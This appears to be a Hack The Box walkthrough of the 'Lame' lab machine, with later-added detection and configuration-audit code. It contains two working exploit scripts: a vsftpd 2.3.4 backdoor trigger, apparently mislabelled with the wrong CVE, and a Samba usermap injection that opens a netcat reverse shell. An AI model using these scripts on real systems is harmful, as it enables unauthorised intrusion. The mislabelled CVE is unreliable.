Thursday, June 11, 2020

Machine: Lame


Platform: Hack The Box
OS: Linux
Machine: Lame
IP address: 10.10.10.3

Reconnaissance


Commands:
nmap -sC -sV 10.10.10.3



We look for an exploit for the following service versions:

Commands:
searchsploit vsftpd 2.3.4
searchsploit OpenSSH 4.7p1
searchsploit Samba 3.0.20
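The searchsploit step above is a manual version lookup. As an added example (not code from the original post), the following Python script automates the defender's side of that step: it parses open-port lines from nmap -sV style output, extracts the version token from each banner, and reports every service whose version is on a review list. The NMAP_OUTPUT sample is constructed to mirror the service versions the post looks up; the review list and all function names are hypothetical.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Set, Tuple

# Constructed sample modelled on "nmap -sV" normal output for a host running
# the same service versions the post looks up (not real captured output).
NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.3
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

# Hypothetical review list: the product/version pairs the post feeds to
# searchsploit, keyed by the product prefix nmap prints in the VERSION column.
VERSIONS_TO_REVIEW: Dict[str, Set[str]] = {
    "vsftpd": {"2.3.4"},
    "OpenSSH": {"4.7p1"},
    "Samba smbd": {"3.0.20"},
}

# One open-port line of nmap normal output:
# "<port>/<proto>  open  <service>  <version banner>"
PORT_LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)\s+(?P<banner>.+?)\s*$"
)
# First token that looks like a version number, e.g. "2.3.4", "4.7p1", "3.0.20".
# "3.X - 4.X" style ranges deliberately do not match: nmap could not pin a version.
VERSION_RE = re.compile(r"\d+\.\d+(?:\.\d+)*[A-Za-z0-9]*")


class Service(NamedTuple):
    port: int
    proto: str
    service: str
    banner: str              # the VERSION column as nmap printed it
    version: Optional[str]   # extracted version token, None if none was found


def parse_nmap(text: str) -> List[Service]:
    """Extract open-port service lines from nmap normal output."""
    services: List[Service] = []
    for line in text.splitlines():
        m = PORT_LINE_RE.match(line)
        if not m:
            continue  # headers, blank lines and closed/filtered ports are skipped
        banner = m.group("banner")
        v = VERSION_RE.search(banner)
        services.append(Service(int(m.group("port")), m.group("proto"),
                                m.group("service"), banner, v.group(0) if v else None))
    return services


def match_watchlist(services: List[Service],
                    watchlist: Dict[str, Set[str]] = VERSIONS_TO_REVIEW
                    ) -> List[Tuple[int, str, str]]:
    """Return (port, product, version) for every service whose version is on the list."""
    hits: List[Tuple[int, str, str]] = []
    for s in services:
        for product, versions in watchlist.items():
            if s.banner.startswith(product) and s.version in versions:
                hits.append((s.port, product, s.version))
    return hits


if __name__ == "__main__":
    for port, product, version in match_watchlist(parse_nmap(NMAP_OUTPUT)):
        print(f"port {port}: {product} {version} is on the review list")
```

Matching on a product prefix plus an exact version token keeps the check conservative: the port 139 banner, where nmap only reports a "3.X - 4.X" range, produces no hit and has to be confirmed by other means.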


Exploitation


We find the following scripts to exploit these service versions:

Service version: vsftpd 2.3.4
CVE: CVE-2011-0762
Script:
#!/usr/bin/python3
import socket
import sys
import time


def exploit(ip, port, command):
    """ Triggers vsftpd 2.3.4 backdoor and prints supplied command's output """

    try:
        print('[*] Attempting to trigger backdoor...')
        ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        ftp_socket.connect((ip, port))

        # Attempt to login to trigger backdoor
        ftp_socket.send(b'USER letmein:)\n')
        ftp_socket.send(b'PASS please\n')
        time.sleep(2)
        ftp_socket.close()
        print('[+] Triggered backdoor')

    except Exception:
        print('[!] Failed to trigger backdoor on %s' % ip)

    try:
        print('[*] Attempting to connect to backdoor...')
        backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        backdoor_socket.connect((ip, 6200))
        print('[+] Connected to backdoor on %s:6200' % ip)
        command = str.encode(command + '\n')
        backdoor_socket.send(command)
        response = backdoor_socket.recv(1024).decode('utf-8')
        print('[+] Response:\n', response, sep='')
        backdoor_socket.close()

    except Exception:
        print('[!] Failed to connect to backdoor on %s:6200' % ip)


if __name__ == '__main__':

    if len(sys.argv) < 4:
        print('Usage: ./vsftpd_234_exploit.py <IP address> <port> <command>')
        print('Example: ./vsftpd_234_exploit.py 192.168.1.10 21 whoami')

    else:
        exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3])

As we can see, the script did not work:


We try the next one:

Service version: Samba 3.0.20
CVE: CVE-2007-2447
Script:
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
#
# Requires the pysmb package (pip install pysmb). Samba's "username map script"
# smb.conf option passes the supplied user name to a shell command, so the
# payload is smuggled through the user name inside backticks.

import sys
from smb.SMBConnection import SMBConnection


def exploit(rhost, rport, lhost, lport):
    # Reverse shell back to LHOST:LPORT through a named pipe and netcat
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        # connect() is expected to time out or fail once the payload runs;
        # the script treats that exception as the "sent" signal.
        conn.connect(rhost, int(rport), timeout=1)
    except Exception:
        print('[+] Payload was sent - check netcat !')


if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
We run the script and leave port 444 listening with netcat to receive the reverse shell:
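Both scripts above share one trait that a defender can key on: the malicious input travels in the user name presented at login. As an added example (not code from the post or from the linked repositories), the following Python script flags FTP logins whose USER value contains the ":)" sequence that arms the vsftpd 2.3.4 backdoor, flags SMB logins whose user name carries shell metacharacters as in the CVE-2007-2447 usermap script pattern, and audits an smb.conf fragment for the "username map script" option that the Samba exploit depends on. The AuthEvent records, the sample events, the smb.conf fragment and its script path are all constructed; the function names are hypothetical.

```python
import re
from typing import List, NamedTuple, Optional


class AuthEvent(NamedTuple):
    service: str    # "ftp" or "smb"
    client: str     # source address as a string
    username: str   # user name presented at login


class Finding(NamedTuple):
    event: AuthEvent
    reason: str


# vsftpd 2.3.4's backdoor is armed by a USER name containing ":)" (the first
# script above sends "USER letmein:)").
FTP_BACKDOOR_MARKER = ":)"

# CVE-2007-2447 smuggles shell syntax through the SMB user name into the
# "username map script" command; none of these characters belong in a user name.
SHELL_META_RE = re.compile(r"[`;|&$]")


def inspect_auth_event(ev: AuthEvent) -> Optional[Finding]:
    """Flag one login event if its user name carries either exploit signature."""
    if ev.service == "ftp" and FTP_BACKDOOR_MARKER in ev.username:
        return Finding(ev, "vsftpd 2.3.4 backdoor trigger in FTP USER")
    if ev.service == "smb" and SHELL_META_RE.search(ev.username):
        return Finding(ev, "shell metacharacters in SMB user name (CVE-2007-2447 pattern)")
    return None


def inspect_all(events: List[AuthEvent]) -> List[Finding]:
    return [f for f in (inspect_auth_event(e) for e in events) if f is not None]


# The smb.conf option CVE-2007-2447 needs. Samba treats option names
# case-insensitively and ignores internal whitespace, so the pattern does too.
USERNAME_MAP_SCRIPT_RE = re.compile(
    r"^\s*username\s*map\s*script\s*=\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE
)


def smb_conf_username_map_script(conf_text: str) -> Optional[str]:
    """Return the configured 'username map script' command, or None if unset."""
    m = USERNAME_MAP_SCRIPT_RE.search(conf_text)
    return m.group(1) if m else None


# Constructed sample events (198.51.100.0/24 is a documentation range).
SAMPLE_EVENTS = [
    AuthEvent("ftp", "198.51.100.7", "letmein:)"),
    AuthEvent("ftp", "198.51.100.8", "anonymous"),
    AuthEvent("smb", "198.51.100.7", "/=`nohup id`"),
    AuthEvent("smb", "198.51.100.9", "alice"),
]

# Constructed smb.conf fragment with the risky option present; the path is a placeholder.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
"""

if __name__ == "__main__":
    for f in inspect_all(SAMPLE_EVENTS):
        print(f"[!] {f.event.service} login from {f.event.client}: {f.reason}")
    script = smb_conf_username_map_script(SAMPLE_SMB_CONF)
    if script:
        print(f"[!] smb.conf sets 'username map script = {script}'")
```

The login check works from whatever already records user names (FTP server logs, Samba logs, or an IDS watching the control channel), while the configuration check is the mitigation side: on the affected Samba versions, removing the "username map script" option closes the injection path even before the package is upgraded.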


Finally we obtain the root and user flags:

Commands:
whoami
uname -a
id
